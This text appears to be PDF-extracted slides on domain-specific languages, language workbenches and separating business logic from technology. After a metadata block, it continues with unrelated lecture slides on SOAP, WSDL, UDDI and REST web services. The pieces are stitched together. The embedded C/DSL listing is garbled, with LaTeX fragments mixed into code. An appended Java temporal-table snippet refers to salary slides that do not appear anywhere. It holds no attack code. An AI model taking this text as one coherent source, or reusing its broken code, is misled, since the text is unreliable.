Let business/domain people contribute directly! Give them expressive, productive tools to do so:
- Expressivity for core domain knowledge
- User-friendly notation
- Great tool/IDE
- Testing
- Meaningful analyses
- Synthesis of software
- Separation from technology

Outdated technology, obscure business logic: the Fachlichkeit is „buried" in implementation code, and technology and business logic have connected lifecycles.

Goal: Separate the Lifecycles (Fachlichkeit / Technology)

Separation of concerns (from Wikipedia, the free encyclopedia): In computer science, separation of concerns (SoC) is a design principle for separating a computer program into distinct sections, such that each section addresses a separate concern. A concern is a set of information that affects the code of a computer program. A concern can be as general as the details of the hardware the code is being optimized for, or as specific as the name of a class to instantiate. A program that embodies SoC well is called a modular program. Modularity, and hence separation of concerns, is achieved by encapsulating information inside a section of code that has a well-defined interface. Encapsulation is a means of information hiding. Layered designs in information systems are another embodiment of separation of concerns (e.g., presentation layer, business logic layer, data access layer, persistence layer). The value of separation of concerns is simplifying development and maintenance of computer programs. When concerns are well-separated, individual sections can be reused, as well as developed and updated independently. Of special value is the ability to later improve or modify one section of code without having to know the details of other sections, and without having to make corresponding changes to those sections.

Outdated technology, non-understandable logic, expensive to evolve: Business Logic vs. Technology.

Metamodel for Business Logic: a clearly defined data structure to express all business-relevant structures, behaviors and non-functional concerns.
- Data Structures
- Behavioral Rules
- Expressions
- Validations
- Special Types (e.g. temporal)
...
Domains often have a rich language/vocabulary anyway; it just needs to be formalized. (DDD: Ubiquitous Language)
Metamodel for Business Logic + Semantics: the clearly defined data structure to express all business-relevant structures, behaviors and non-functional concerns, plus a well-defined meaning of this data structure. With semantics, the following become possible:
- IDE Support
- Evolution
- Portability
- Type Checking
- Solver-Integration
- Model Checking
- Contracts

Metamodel + Semantics + Tech Infrastructure:
- Metamodel for Business Logic: clearly defined data structure to express all business-relevant structures, behaviors and non-functional concerns.
- Semantics: well-defined meaning of this data structure.
- Execution Engine / Tech Infrastructure: technical platform for correct, efficient and scalable execution.
The two sides are connected by "generate code, deploy" or "transfer data, interpret".

Metamodel + Syntax + Semantics = Language, on top of the Tech Infrastructure.
Syntax is critically important for productivity, communication and review, and domain expert integration. Only buttons and forms don't work!

The language is defined and used in a Language Workbench: a tool for defining, composing and using ecosystems of languages.

Other Language Workbenches: Spoofax (TU Delft), Xtext (itemis/TypeFox), Rascal (CWI Amsterdam), The Whole Platform (Solmi/Persiani).

"Evaluating and Comparing Language Workbenches: Existing Results and Benchmarks for the Future": Sebastian Erdweg, Tijs van der Storm, Markus Völter, Laurence Tratt, Remi Bosman, William R. Cook, Albert Gerritsen, Angelo Hulshout, Steven Kelly, Alex Loh, Gabriël Konat, Pedro J.
Molina, Martin Palatnik, Risto Pohjonen, Eugen Schindler, Klemens Schindler, Riccardo Solmi, Vlad Vergu, Eelco Visser, Kevin van der Vlist, Guido Wachsmuth, Jimi van der Woning. (Affiliations: CWI, The Netherlands; King's College London, UK; University of Texas at Austin, US; TU Darmstadt, Germany; voelter.de, Stuttgart, Germany; Sioux, Eindhoven, The Netherlands; Delphino Consultancy; MetaCase, Jyväskylä, Finland; TU Delft, The Netherlands; Icistic, Sevilla, Spain; Sogyo, De Bilt, The Netherlands; Young Colfield, Amsterdam, The Netherlands.)

Lessons Learned

A Language is not Enough

Language Design::More than Lang
- Language: Abstractions, Notations
- Great IDE: Syntax Coloring, Code Completion, Goto Definition
- Analyses: Relevant, Good Errors
- Refactorings: Aligned with Processes
- Testing: Write Tests, Run them, Report Back. GREAT
- Debuggers: Animate Execution
- Simulators

fun midnight1(a: number, b: number, c: number) = (-b + sqrt(pow2(b) - 4 * a * c)) / (2 * a)

fun midnight2(a: number, b: number, c: number) {
  val bSquared = pow2(b)
  val sqrtPart = sqrt(bSquared - 4 * a * c)
  (-b + sqrtPart) / (2 * a)
}

fun midnight3(a: number, b: number, c: number) {
  $\frac{-b + \sqrt{b^2 - 4ac}}{2a}$
}

Feature Models

[Component-architecture diagram: FourCylEngine, DriveTrainController and Gearbox components with ports DrivingCommands_in, RoadConditions_in, EngineStatus_out, SpeedFromEngine_out, Gear_out]
composite block[plusOffset: number, minusOffset: number] plusMinus_Composite_Offset(a: number, b: number) -> (sum, difference)

Unterhaltsvorschuss (advance child maintenance; German-language DSL model)
Zeitangabe: laufend; Häufigkeit: monatlich einmal; Leistungskontext: Leer; Leistungsart: Leer; Zählart: uvg
Anspruch Beginn: Anfang – Unbegrenzt: junger Mensch.geburtsdatum
Anspruch Ende: 01.01.1800 – 31.12.9999: min(junger Mensch.geburtsdatum + 12 Jahre, datum + 72 Monate – Anzahl Monate mit uvg)
Zeitraum für Berechnung: Anfang – Unbegrenzt: {standardzeitraum, standardzeitraum}
zweckgebundene Leistung: ☐   dem Grunde nach: ☐
Zeitraumbezogene Daten:
  nullwerteAnzeigen: boolean = 01.01.1800 – 31.05.2016: true; 01.06.2016 – Unbegrenzt: false
  berechnungsart: berechnungsarttyp = 01.01.1800 – 31.12.9999: dreißigstel
Bezugsobjekte:
Attribute: bemerkung: string (wird validiert); antragsdatum: Datum

Influences on the Language
Language Design::Influences
- Domain Structure
- Non Functionals: Permissions, IP, Sharing
- User Skills
- Model Purpose: Analyze, Generate
- Tool Capabilities: Notations, Editing, Scale
- Software Engineering Practices
- Style!
- Sep. of Concerns: Different Views
- Refactor towards Structure
Get a better tool :-)

How to make People precise?
Precision: { formulas, rules, data structures, tables, values }
Performance, scalability, robustness, deployment: { programming }

Does this scale?

Does the approach scale? If structure, formalization, and tool support don't scale, then what will? What are the alternatives: Excel? Wikis? Prose documents?

Do the tools scale?
- In terms of overall system size? Yes, but the system has to be broken down into models of manageable size, as usual. This requires some thought.
- In terms of team size? Yes, since we rely on established version control systems (git) to deal with groupware aspects; and yes, diff/merge work as expected.
- In terms of language complexity? Yes, in particular since you can modularize the language definitions.

Can I find the people to do this? Yes, but it is a significant change, so:
- it may be a significant education/training effort;
- a few people might not get it;
- a few people may not want to do it. This is a threat!

Precision and formality, different processes, higher efficiency: new skills, role changes, job losses.
Automation, focus on engineering, empowered business people: job losses, role changes, less importance.
Some people are afraid of this. Take them seriously. It is a change of culture that must be managed!

Is this the next legacy system?

Today's software is tomorrow's legacy system. Or is it?
Business change is hard; technology change is hard. Separation of concerns: keep the business logic free of technology, make it „portable".
Existing models become incompatible with the new language: language versions, migration scripts.
Runtime tech outdated, uncool or slow: keep the language technology, keep the models, build a new generator.
Language tech outdated, uncool: build a new tool, migrate the data. Simple, because the models carry well-defined domain semantics and are free from „technology stuff".
Today's software is tomorrow's legacy system. No, it is not.

In conflict with Agile?

"MD* and Agile is in conflict."
- Manage it like any other intra-project dependency. Evolution of client code is easier than for F/L/P because of migration support!
- Manage it like any other 3rd-party dependency: development roadmap, issue tracker, release notes.
- Models and DSLs are an enabler for agility: integration of domain experts, „living" requirements, decoupled Fachlichkeit & Technik.
- Leading LWBs are so productive that you can literally sit with the domain experts and interactively prototype languages (and then clean up later).
"I've looked at the implementation of the language in MPS, but I didn't find much. Is this all there is? Where's the magic?" [Customer]

Skills?

Organizations do not have the necessary skills. True. But...

Rockets ????
Further domain-specific extensions to C. Developed by end-user lang engineer. <table> <thead> <tr> <th>User Extensions</th> <th>User-defined Layer</th> </tr> </thead> <tbody> <tr> <td>Languages shipped with mbeddr</td> <td>C99</td> </tr> <tr> <td>Plattform</td> <td>Libraries for web server, node navigation, additional notations, pattern matching, palettes, XML processing, debugging...</td> </tr> <tr> <td>MPS</td> <td>Syntax Highlighting, Code Completion, Goto Definition, Find Usages, Type Checking, Data Flow Analysis, Refactoring, Versioning, Debugging</td> </tr> <tr> <td>Foundation</td> <td>C Compiler &amp; Debugger</td> </tr> <tr> <td></td> <td>PlantUML</td> </tr> <tr> <td></td> <td>Latex</td> </tr> <tr> <td></td> <td>HTML</td> </tr> <tr> <td></td> <td>CBMC</td> </tr> <tr> <td></td> <td>Z3</td> </tr> <tr> <td></td> <td>Sat4J</td> </tr> <tr> <td></td> <td>Implementation</td> </tr> <tr> <td></td> <td>Process</td> </tr> <tr> <td></td> <td>Analysis</td> </tr> </tbody> </table> Infrastructure Specifics in C ```c #include TEMP_BUFFER_SIZE = 10; TACQA = Instance of Temperature Acquisition with mnemonic tail A and the Numeric Id 350 [SENSOR = SensorA] TACQB = Instance of Temperature Acquisition with mnemonic tail B and the Numeric Id 351 [SENSOR = SensorB] Component Temperature Acquisition with Base Mnemonic: TACQ Short Description: acquisition of temperatures Description: The components acquires the measurements of an assigned set of thermistors { Attribute (hidden) int32/rawTemp/[TEMP_BUFFER_SIZE] MEASURED = <no init>; // measured raw values Attribute (hidden) uint32 ACQCTN = 0; // index for filling data acquisition buffer Attribute (readwrite) tempSensor SENSOR (Id=2) = <no init>; // selected sensor for this component Mode Chart TCSACQ (Id=3) initial = OFF { Trigger tcsAcquisition Mode OFF { << ... >> } Mode ON { entry { ACQCTN = 0; } on trigger tcsAcquisition { // measure a value MEASURED[ACQCTN] = readTemperature(SENSOR); ACQCTN = (ACQCTN + 1) % TEMP_BUFFER_SIZE; // calculate average of the @top(TEMP_BUFFER_SIZE) latest measurements and convert to °C TEMP_BUFFER_SIZE - 1 AVTEMP = convert[\sum_{idx = 0}^{\text{TEMP_BUFFER_SIZE} - 1} \frac{MEASURED[idx]}{\text{TEMP_BUFFER_SIZE} \to °C}; } } } Activity startAcquisition with Numeric Id 1 ... { TCSACQ.setMode(ON); } Activity stopAcquisition with Numeric Id 2 ... { TCSACQ.setMode(OFF); } } Component Temperature Acquisition ``` Infrastructure Specifics in C Activity enableTcs with Numeric Id 1 is commandable by TC(150,1) Short Description: enable thermal control Description: The thermal control heats the system if it is too cold. The switching hysteresis can be configured. Constraints: 0: TCSCONTR.inMode(OFF) // switching on is possible only if the TCS is off In-Parameter: int16°C/ upperThreshold: constrained: <no constraint> // upper switching threshold int16°C/ lowerThreshold: constrained: lowerThreshold < upperThreshold // lower switching threshold component<TemperatureAcquisition> acq: constrained: <no constraint> // acquisition component instance to use { REQUEST acq.startAcquisition ( << ... >> ) --> ( << ... >> ) on error do nothing special UPTH = upperThreshold; LOTH = lowerThreshold; DELAY for 10 s TCSCONTR.setMode(ON); TELEMETRY (150,11) Description: Report switching on in a dedicated packet that reports the initial temperature. 
} Activity disableTcs with Numeric Id 2 is commandable by TC(150,2) Short Description: disable thermal control Description: Constraints: 0: TCSCONTR.inMode(ON) // switching off is possible only if the TCS is on In-Parameter: << ... >> { TCSCONTR.setMode(OFF); REQUEST TACQA.stopAcquisition ( << ... >> ) --> ( << ... >> ) on error do nothing special REQUEST TACQB.stopAcquisition ( << ... >> ) --> ( << ... >> ) on error do nothing special } } Component ThermalControlSystem TCSCONTR thermal control OFF thermal control is inactive TC(150,1) enableTcs TC(150,2) disableTcs ON thermal control is active trigger tcsControl periodically triggered for altering the heater power state according to the measured values exit disable all heaters PUS128 TelemetryService enableTcs TACQ_startAcquisition TM(150,11); queue=10 ProcessTelemetry TCSACQ->ON DELAY 10 s Separation of concerns is key to avoid the legacy trap. **DSLs can isolate business logic completely from technical concerns** **DSLs can help integrate domain experts with communication/review or even coding** **Language Workbenches enable DSLs by reducing effort to build, compose and maintain them** **Migrating to a new LWB is feasible b/c semantics of all models are known, by definition.**
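To close the salary example from earlier in this deck with something executable, here is a rough, general-purpose sketch of the temporal-table idea: a value with different validities over time that can be queried at a date and combined pointwise. This is our own illustration in plain Java, not the DSL's implementation, and it assumes both operands have an entry at or before any queried date.

```java
// A tiny temporal table: values valid from a given start date onward.
// Our own sketch of the "TT" idea from the salary slides, not the DSL's implementation.
import java.time.LocalDate;
import java.util.NavigableMap;
import java.util.TreeMap;
import java.util.TreeSet;

class TemporalTable {
    private final NavigableMap<LocalDate, Double> entries = new TreeMap<>();

    void put(LocalDate validFrom, double value) {
        entries.put(validFrom, value);
    }

    // Value valid at the given date: the entry with the latest start date <= d.
    double valueAt(LocalDate d) {
        return entries.floorEntry(d).getValue();
    }

    // Pointwise addition: the result changes whenever either operand changes.
    TemporalTable plus(TemporalTable other) {
        TemporalTable result = new TemporalTable();
        TreeSet<LocalDate> changePoints = new TreeSet<>(entries.keySet());
        changePoints.addAll(other.entries.keySet());
        for (LocalDate d : changePoints) {
            result.put(d, this.valueAt(d) + other.valueAt(d));
        }
        return result;
    }
}
```

With entries of 5 000 EUR from 2017-01-01 and 6 000 EUR from 2017-05-01, valueAt(2017-10-07) returns 6 000, matching the salary slide.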
{"Source-Url": "http://www.voelter.de/data/presentations/jax2018-fachlichkeit.pdf", "len_cl100k_base": 6898, "olmocr-version": "0.1.50", "pdf-total-pages": 102, "total-fallback-pages": 0, "total-input-tokens": 127236, "total-output-tokens": 10578, "length": "2e12", "weborganizer": {"__label__adult": 0.00033926963806152344, "__label__art_design": 0.0003185272216796875, "__label__crime_law": 0.00021016597747802737, "__label__education_jobs": 0.0005517005920410156, "__label__entertainment": 5.543231964111328e-05, "__label__fashion_beauty": 0.00011754035949707033, "__label__finance_business": 0.0004544258117675781, "__label__food_dining": 0.00032329559326171875, "__label__games": 0.00040841102600097656, "__label__hardware": 0.0005693435668945312, "__label__health": 0.00024306774139404297, "__label__history": 0.0001373291015625, "__label__home_hobbies": 8.946657180786133e-05, "__label__industrial": 0.0003075599670410156, "__label__literature": 0.00016629695892333984, "__label__politics": 0.0001926422119140625, "__label__religion": 0.0002448558807373047, "__label__science_tech": 0.0026760101318359375, "__label__social_life": 8.32676887512207e-05, "__label__software": 0.004085540771484375, "__label__software_dev": 0.98779296875, "__label__sports_fitness": 0.0002310276031494141, "__label__transportation": 0.00034332275390625, "__label__travel": 0.00015282630920410156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 24957, 0.01752]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 24957, 0.19677]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 24957, 0.66857]], "google_gemma-3-12b-it_contains_pii": [[0, 162, false], [162, 173, null], [173, 478, null], [478, 487, null], [487, 498, null], [498, 639, null], [639, 995, null], [995, 1186, null], [1186, 2404, null], [2404, 2966, null], [2966, 2966, null], [2966, 2976, null], [2976, 3185, null], [3185, 3394, null], [3394, 3750, null], [3750, 3910, null], [3910, 4250, null], [4250, 4257, null], [4257, 4485, null], [4485, 4856, null], [4856, 5970, null], [5970, 6673, null], [6673, 7220, null], [7220, 7232, null], [7232, 7255, null], [7255, 7278, null], [7278, 7491, null], [7491, 7626, null], [7626, 7738, null], [7738, 7746, null], [7746, 7753, null], [7753, 7850, null], [7850, 7981, null], [7981, 8008, null], [8008, 8051, null], [8051, 8098, null], [8098, 8157, null], [8157, 8213, null], [8213, 8223, null], [8223, 9556, null], [9556, 9649, null], [9649, 9794, null], [9794, 9925, null], [9925, 10038, null], [10038, 10239, null], [10239, 10584, null], [10584, 10890, null], [10890, 11183, null], [11183, 11296, null], [11296, 11424, null], [11424, 11678, null], [11678, 11804, null], [11804, 11942, null], [11942, 12031, null], [12031, 12162, null], [12162, 13606, null], [13606, 13622, null], [13622, 13647, null], [13647, 13994, null], [13994, 13994, null], [13994, 14341, null], [14341, 14532, null], [14532, 14660, null], [14660, 15383, null], [15383, 16100, null], [16100, 16127, null], [16127, 16361, null], [16361, 16680, null], [16680, 16708, null], [16708, 16843, null], [16843, 16860, null], [16860, 17039, null], [17039, 17464, null], [17464, 17664, null], [17664, 17682, null], [17682, 17881, null], [17881, 17934, null], [17934, 17976, null], [17976, 18008, null], [18008, 18064, null], [18064, 18230, null], [18230, 18230, null], [18230, 18324, null], [18324, 18418, null], [18418, 18563, null], [18563, 18625, null], [18625, 
18649, null], [18649, 18682, null], [18682, 18842, null], [18842, 18973, null], [18973, 19140, null], [19140, 19449, null], [19449, 19758, null], [19758, 19766, null], [19766, 19860, null], [19860, 19873, null], [19873, 19873, null], [19873, 21170, null], [21170, 22679, null], [22679, 24168, null], [24168, 24558, null], [24558, 24957, null]], "google_gemma-3-12b-it_is_public_document": [[0, 162, true], [162, 173, null], [173, 478, null], [478, 487, null], [487, 498, null], [498, 639, null], [639, 995, null], [995, 1186, null], [1186, 2404, null], [2404, 2966, null], [2966, 2966, null], [2966, 2976, null], [2976, 3185, null], [3185, 3394, null], [3394, 3750, null], [3750, 3910, null], [3910, 4250, null], [4250, 4257, null], [4257, 4485, null], [4485, 4856, null], [4856, 5970, null], [5970, 6673, null], [6673, 7220, null], [7220, 7232, null], [7232, 7255, null], [7255, 7278, null], [7278, 7491, null], [7491, 7626, null], [7626, 7738, null], [7738, 7746, null], [7746, 7753, null], [7753, 7850, null], [7850, 7981, null], [7981, 8008, null], [8008, 8051, null], [8051, 8098, null], [8098, 8157, null], [8157, 8213, null], [8213, 8223, null], [8223, 9556, null], [9556, 9649, null], [9649, 9794, null], [9794, 9925, null], [9925, 10038, null], [10038, 10239, null], [10239, 10584, null], [10584, 10890, null], [10890, 11183, null], [11183, 11296, null], [11296, 11424, null], [11424, 11678, null], [11678, 11804, null], [11804, 11942, null], [11942, 12031, null], [12031, 12162, null], [12162, 13606, null], [13606, 13622, null], [13622, 13647, null], [13647, 13994, null], [13994, 13994, null], [13994, 14341, null], [14341, 14532, null], [14532, 14660, null], [14660, 15383, null], [15383, 16100, null], [16100, 16127, null], [16127, 16361, null], [16361, 16680, null], [16680, 16708, null], [16708, 16843, null], [16843, 16860, null], [16860, 17039, null], [17039, 17464, null], [17464, 17664, null], [17664, 17682, null], [17682, 17881, null], [17881, 17934, null], [17934, 17976, null], [17976, 18008, null], [18008, 18064, null], [18064, 18230, null], [18230, 18230, null], [18230, 18324, null], [18324, 18418, null], [18418, 18563, null], [18563, 18625, null], [18625, 18649, null], [18649, 18682, null], [18682, 18842, null], [18842, 18973, null], [18973, 19140, null], [19140, 19449, null], [19449, 19758, null], [19758, 19766, null], [19766, 19860, null], [19860, 19873, null], [19873, 19873, null], [19873, 21170, null], [21170, 22679, null], [22679, 24168, null], [24168, 24558, null], [24558, 24957, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 24957, null]], "pdf_page_numbers": [[0, 162, 1], [162, 173, 2], [173, 478, 3], [478, 487, 4], [487, 498, 5], [498, 639, 6], [639, 995, 7], [995, 
1186, 8], [1186, 2404, 9], [2404, 2966, 10], [2966, 2966, 11], [2966, 2976, 12], [2976, 3185, 13], [3185, 3394, 14], [3394, 3750, 15], [3750, 3910, 16], [3910, 4250, 17], [4250, 4257, 18], [4257, 4485, 19], [4485, 4856, 20], [4856, 5970, 21], [5970, 6673, 22], [6673, 7220, 23], [7220, 7232, 24], [7232, 7255, 25], [7255, 7278, 26], [7278, 7491, 27], [7491, 7626, 28], [7626, 7738, 29], [7738, 7746, 30], [7746, 7753, 31], [7753, 7850, 32], [7850, 7981, 33], [7981, 8008, 34], [8008, 8051, 35], [8051, 8098, 36], [8098, 8157, 37], [8157, 8213, 38], [8213, 8223, 39], [8223, 9556, 40], [9556, 9649, 41], [9649, 9794, 42], [9794, 9925, 43], [9925, 10038, 44], [10038, 10239, 45], [10239, 10584, 46], [10584, 10890, 47], [10890, 11183, 48], [11183, 11296, 49], [11296, 11424, 50], [11424, 11678, 51], [11678, 11804, 52], [11804, 11942, 53], [11942, 12031, 54], [12031, 12162, 55], [12162, 13606, 56], [13606, 13622, 57], [13622, 13647, 58], [13647, 13994, 59], [13994, 13994, 60], [13994, 14341, 61], [14341, 14532, 62], [14532, 14660, 63], [14660, 15383, 64], [15383, 16100, 65], [16100, 16127, 66], [16127, 16361, 67], [16361, 16680, 68], [16680, 16708, 69], [16708, 16843, 70], [16843, 16860, 71], [16860, 17039, 72], [17039, 17464, 73], [17464, 17664, 74], [17664, 17682, 75], [17682, 17881, 76], [17881, 17934, 77], [17934, 17976, 78], [17976, 18008, 79], [18008, 18064, 80], [18064, 18230, 81], [18230, 18230, 82], [18230, 18324, 83], [18324, 18418, 84], [18418, 18563, 85], [18563, 18625, 86], [18625, 18649, 87], [18649, 18682, 88], [18682, 18842, 89], [18842, 18973, 90], [18973, 19140, 91], [19140, 19449, 92], [19449, 19758, 93], [19758, 19766, 94], [19766, 19860, 95], [19860, 19873, 96], [19873, 19873, 97], [19873, 21170, 98], [21170, 22679, 99], [22679, 24168, 100], [24168, 24558, 101], [24558, 24957, 102]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 24957, 0.03395]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
33b7a28f42d769804da80e74e076ffa8ecd46193
Building Large Scale Information Systems
REST, Publish/Subscribe, PageRank

Focus of Different Data Models
[Figure: CAP theorem triangle with Consistency, Availability and Partition Tolerance; RDBMS vs. most NoSQL systems]

[Figure: "The evolving database landscape", a vendor map spanning non-relational vs. relational and operational vs. analytic systems, including Hadoop, Cassandra, HBase, MongoDB, Redis, Neo4j, MySQL, Oracle, IBM DB2, SAP HANA, database-as-a-service offerings such as Amazon RDS and Google Cloud SQL, and NewSQL engines such as NuoDB and MemSQL]

Background: WEB SERVICES

What is a Web Service?
- A piece of software available over the Internet
- Uses a standardized (i.e., XML) messaging system
- More general definition: a collection of protocols and standards used for exchanging data between applications or systems

Web Service Architecture
- Service-Oriented Architecture

Architecture II
All the technologies are XML based ...

Open, Standard Technologies
- XML – tags data so that it can be exchanged between applications and platforms
- SOAP – messaging protocol for transporting information and instructions between applications (uses XML)
- WSDL – a standard method of describing web services and their specific capabilities (XML)
- UDDI – defines XML-based rules for building directories in which companies advertise themselves and their web services

SOAP
- Simple Object Access Protocol
- Format for sending messages over the Internet between programs
- XML-based
- Platform and language independent
- Simple and extensible
- Stateless, one-way
- But applications can create more complex interaction patterns

SOAP Building Blocks
- Envelope (required) – identifies the XML document as a SOAP message
- Header (optional) – contains header information
- Body (required) – call and response information
- Fault (optional) – errors that occurred while processing the message

Simple Example: "Get the price of apples"
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope" soap:encodingStyle="http://www.w3.org/2001/12/soap-encoding">
  <soap:Body>
    <m:GetPrice xmlns:m="http://www.w3schools.com/prices">
      <m:Item>Apples</m:Item>
    </m:GetPrice>
  </soap:Body>
</soap:Envelope>
Note: GetPrice and Item are application-specific (not part of SOAP)

WSDL (Web Service Description Language)
- Web services are self-describing
- The description is written in WSDL, an XML-based language through which a web service conveys to applications the methods that the service provides and how those methods are accessed
- WSDL is meant to be read by applications (not humans)
- Standard method of describing Web Services and their capabilities
- Idea: automate the details involved in application communication
- Operations and messages are described abstractly
- They are bound to a concrete network protocol and message format to define an endpoint
- Provides documentation for distributed systems

WSDL Details
- A WSDL document defines services
- Services are collections of network endpoints (ports)
- The abstract definition of endpoints and messages is separated from their concrete network
deployment or data format bindings
- This allows the reuse of abstract definitions:
  - messages: abstract descriptions of the data being exchanged
  - port types: abstract collections of operations
  - the concrete protocol and data format specifications for a particular port type constitute a reusable binding

An example

```xml
<message name="searchSimple1In">
  <part name="program" type="xsd:string"/>
  <part name="database" type="xsd:string"/>
  <part name="query" type="xsd:string"/>
</message>
<message name="searchSimple1Out">
  <part name="Result" type="xsd:string"/>
</message>
```

Example (continued)

```xml
<portType name="Blast">
  <operation name="searchSimple" parameterOrder="program database query">
    <documentation>Execute Blast</documentation>
    <input name="searchSimple1In" message="tns:searchSimple1In"/>
    <output name="searchSimple1Out" message="tns:searchSimple1Out"/>
  </operation>
  ....[other operations]
</portType>
```

Summary
- A WSDL document lists the functions supported by each web service, with their inputs and outputs
- To actually call a web service, you need an interface or tools:
  - SOAP::Lite (Perl)
  - Apache Axis (Java)
  - Many others...

UDDI
- UDDI defines an XML-based format that describes electronic capabilities and business processes
- Entries are stored in a UDDI registry
- UDDI Business Registry (UBR)
  - "white pages": contact info, description
  - "yellow pages": classification info, details
  - "green pages": technical data
  - uddi.microsoft.com

REST: Representational State Transfer

Applications on the Web
- In the usual (non-REST) approach, we can use the web to perform RPCs
- Dynamic pages are the result of running remote applications
- It is possible to specify the application and the parameters in the GET request, or send them in a POST request

Web Services
- When calling a remote web service:
  - The client sends the method name and the parameters inside an envelope, i.e., wrapped in XML, in the body of a POST request
  - It receives the result wrapped in an XML envelope
  - This uses SOAP

REST
- A design pattern for implementing network systems
- Provides a set of design principles

Resource
- The web is a collection of resources
- A resource has a URI and content
- A resource can be represented in different ways
- A response provides a representation of a resource
- Can we compare two resources by comparing their content?

Different Representations of a Resource
- Consider an HTML page cs5301.html and the following files:
  - The compression of cs5301.html
  - The result of "fixing" cs5301.html to conform to the XHTML standard
  - The presentation of cs5301.html using different CSS stylesheets
  - The file cs5301.html in different character encodings
  - The file cs5301.html in different languages
- Which of the above is the same resource as cs5301.html?
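One answer: they can all be served as different representations of the same resource, selected through content negotiation. As a rough illustration only, here is a sketch using Java's built-in HTTP client (Java 11+); the URI is hypothetical and no particular server is assumed:

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class ContentNegotiation {
    public static void main(String[] args) throws Exception {
        HttpClient client = HttpClient.newHttpClient();
        // One resource, one URI; the representation is negotiated via headers.
        URI page = URI.create("http://www.example.edu/cs5301.html"); // hypothetical URI

        HttpRequest asHtml = HttpRequest.newBuilder(page)
                .header("Accept", "text/html")
                .header("Accept-Language", "en")
                .build();
        HttpRequest asXhtmlFrench = HttpRequest.newBuilder(page)
                .header("Accept", "application/xhtml+xml")
                .header("Accept-Language", "fr")
                .build();

        // Both responses are representations of the *same* resource.
        HttpResponse<String> r1 = client.send(asHtml, HttpResponse.BodyHandlers.ofString());
        HttpResponse<String> r2 = client.send(asXhtmlFrench, HttpResponse.BodyHandlers.ofString());
        System.out.println(r1.headers().firstValue("Content-Type").orElse("?"));
        System.out.println(r2.headers().firstValue("Content-Type").orElse("?"));
    }
}
```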
Client Interaction
- The client references a web resource using a URL
- A representation of the resource is returned
- The representation places the client in a new state
- When the client selects a hyperlink, it accesses another resource
- The new representation places the client application into yet another state
- Thus, the client application transfers state with each resource representation

Representational State Transfer
"Representational State Transfer is intended to evoke an image of how a well-designed Web application behaves: a network of web pages (a virtual state-machine), where the user progresses through an application by selecting links (state transitions), resulting in the next page (representing the next state of the application) being transferred to the user and rendered for their use." - Roy Fielding

Services
- In REST, there is a resource for every service
- There is a URL for every resource
- So, how do we call a service?

Application Invocation
RESTful: http://university.edu/students/55456
non-RESTful: http://university.edu/getStudent?id=55456

List of Students
RESTful: http://university.edu/students/

```xml
<?xml version="1.0"?>
<Students>
  <Student id="55345" href="http://www.university.edu/students/55345"/>
  <Student id="55346" href="http://www.university.edu/students/55346"/>
  <Student id="55347" href="http://www.university.edu/students/55347"/>
  <Student id="55348" href="http://www.university.edu/students/55348"/>
</Students>
```

To return a list of resources, the service provides a list of URIs

Too Many Addresses?
- Q: If we have 100,000 students, does this mean we need 100,000 web pages? And what if we want to represent 100 grades for each student?
- A: We just need a method to generate/retrieve the representation of the resource upon request

Operations
- All interactions between a client and a web service are done with simple HTTP operations (a sketch follows this list):
  - Retrieve information (HTTP GET)
  - Create information (HTTP PUT)
  - Update information (HTTP POST)
  - Delete information (HTTP DELETE)
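Using the student resource URIs from the earlier slides, this mapping can be sketched with Java's built-in HTTP client (Java 11+). The server side is assumed to exist; the payloads are invented for illustration, and the PUT/POST roles follow the slide's convention above:

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;

public class StudentCrud {
    static final HttpClient http = HttpClient.newHttpClient();
    static final String BASE = "http://university.edu/students"; // URI scheme from the slides

    static String send(HttpRequest r) throws Exception {
        return http.send(r, BodyHandlers.ofString()).body();
    }

    public static void main(String[] args) throws Exception {
        // GET: retrieve the representation of student 55456
        send(HttpRequest.newBuilder(URI.create(BASE + "/55456")).GET().build());

        // PUT: create (or replace) the resource at a known URI
        send(HttpRequest.newBuilder(URI.create(BASE + "/55456"))
                .PUT(BodyPublishers.ofString("<Student id=\"55456\"/>")).build());

        // POST: update (append to) the existing resource
        send(HttpRequest.newBuilder(URI.create(BASE + "/55456"))
                .POST(BodyPublishers.ofString("<Course id=\"333\"/>")).build());

        // DELETE: remove the resource
        send(HttpRequest.newBuilder(URI.create(BASE + "/55456")).DELETE().build());
    }
}
```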
Requirements
- A REST architecture is required to provide:
  - Separation between clients and servers
  - A stateless protocol
  - The ability to cache responses
  - Mediators between clients and servers (e.g., proxies, gateways) that are transparent to users

Benefits of the RESTful Approach
- What are the benefits of using the REST architecture?
- Easier caching. For example, it is not obvious that http://university.edu/getGrade?student=111&course=333 and http://university.edu/getGrade?course=333&student=111 name the same resource, whereas the RESTful http://university.edu/students/111/course/333/grade gives the resource a single canonical name
